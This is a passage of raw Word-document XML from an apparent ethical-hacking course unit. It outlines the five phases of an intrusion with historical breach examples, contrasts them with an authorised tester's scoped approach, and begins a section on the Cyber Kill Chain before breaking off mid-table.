      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every intrusion — real or simulated — generally follows the same five-step sequence. The difference between an attacker and an ethical hacker is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">authorisation and intent at every step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, not the steps themselves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ The 5 phases</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709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1709"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCEBF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Scanning &amp; Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Gaining Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCEBF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Maintaining Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1709"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Covering Tracks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pP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1559"/>
        <w:gridCol w:w="2729"/>
        <w:gridCol w:w="2924"/>
        <w:gridCol w:w="2534"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1559"/>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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2729"/>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What Happens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2924"/>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Real-World Example</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Authorised Tester's Approach</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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1. Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Gathering information passively (OSINT, WHOIS, LinkedIn) and actively (ping sweeps), without attacking yet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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The 2013 Target breach began with attackers harvesting credentials from a third-party HVAC vendor through OSINT and phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Stays within the agreed scope; avoids contacting out-of-scope third parties even if linked to the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1559"/>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2. Scanning &amp; Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2729"/>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Actively probing live systems for open ports, services and known vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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In WannaCry, attackers scanned the internet for hosts with SMBv1 exposed, finding hundreds of thousands of targets at once</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Scans only in-scope IP ranges, during the agreed testing window, at an agreed intensity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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3. Gaining Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Exploiting a found weakness to get an initial foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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The 2017 Equifax breach began with an unpatched Apache Struts vulnerability (CVE-2017-5638) in a public web app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Uses controlled, minimally destructive exploits; documents every exploit attempt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1559"/>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4. Maintaining Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2729"/>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Installing backdoors or new accounts to return later without repeating earlier steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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APT groups such as APT29 install custom malware with several persistence mechanisms, staying hidden for months</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Demonstrates persistence is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">possible</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> in a lab-safe way, then removes any artefacts created and reports the finding — real persistence is never left in a client's live system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="155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5. Covering Tracks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="272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Erasing or editing logs to hide evidence of activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="292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In the 2014 Sony Pictures hack, attackers used wiping malware to destroy logs and disk data after stealing data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Only </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">describes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> this phase in the report — an ethical hacker never actually destroys client evidence or logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="2F5597" w:sz="6"/>
          <w:left w:val="single" w:color="2F5597" w:sz="6"/>
          <w:bottom w:val="single" w:color="2F5597" w:sz="6"/>
          <w:right w:val="single" w:color="2F5597" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="EAF1FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2F5597"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">★ The most important distinction in this unit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">An authorised tester performs phases 1–4 for real (within scope) to prove the risk is genuine, but treats phase 5 purely as something to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">explain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, never to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">do</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> — destroying a client's evidence or logs would itself be an offence and would also hide useful information the client needs to improve their defences.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.8 The Cyber Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cyber Kill Chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, developed by Lockheed Martin, breaks an intrusion into seven stages. Its defensive value is this: an attacker must succeed at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stage, but a defender only needs to break </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> link to stop the whole attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ 7 stages of the Cyber Kill Chain</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135"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1135"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1135"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1135"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1135"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1135"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="1135"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1135"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1135"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCEBF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Weaponization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1135"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="E6F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1135"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:left w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:bottom w:val="single" w:color="0E7C7B" w:sz="6"/>
              <w:right w:val="single" w:color="0E7C7B" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCEBF5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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0E7C7B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1135"/>
